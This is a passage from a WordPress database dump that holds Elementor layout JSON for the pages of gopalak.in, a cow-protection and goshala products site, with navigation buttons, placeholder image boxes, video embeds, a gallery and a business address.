ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9700,1633,'_elementor_page_assets','a:0:{}'),(9702,1634,'_elementor_edit_mode','builder'),(9703,1634,'_elementor_template_type','wp-page'),(9704,1634,'_elementor_version','3.7.8'),(9705,1634,'_wp_page_template','elementor_canvas'),(9706,1634,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 